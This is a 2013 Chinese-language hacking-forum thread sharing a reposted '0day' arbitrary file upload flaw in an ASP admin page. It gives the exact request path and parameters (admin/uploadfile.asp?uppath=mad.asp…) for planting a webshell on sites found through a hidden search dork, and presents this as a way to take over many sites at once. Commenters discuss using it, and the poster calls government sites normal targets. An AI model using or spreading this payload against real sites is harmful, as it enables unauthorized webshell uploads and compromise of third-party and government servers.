made 发表于 2013-1-30 09:02:47

2013.1.29-----任意文件上传漏洞可批量拿shell

转载的。
发布一个0day,是一个任意上传漏洞。

谷歌关键字:
**** Hidden Message *****
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp任意上传拿shell
图:

xiaolynn 发表于 2013-1-30 09:19:38

谢谢分享,来试试,,

xiaolynn 发表于 2013-1-30 09:29:36

那怎么来看他的上传路径呢?

huc-安阳 发表于 2013-1-30 10:02:42

看下是什么东东

huc-安阳 发表于 2013-1-30 10:05:13

楼主,这个关键字百度到275,但是基本都不可用啊,还是GOV的

love 发表于 2013-1-30 10:39:07

最爱Oday了 嘿嘿

made 发表于 2013-1-30 10:48:38

huc-安阳 发表于 2013-1-30 10:05 static/image/common/back.gif
楼主,这个关键字百度到275,但是基本都不可用啊,还是GOV的

gov的很正常

w515426690 发表于 2013-1-30 11:17:29

:):)看看定定

meizhou18 发表于 2013-1-30 11:33:25

aa976102759 发表于 2013-1-30 16:12:03

页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: 2013.1.29-----任意文件上传漏洞可批量拿shell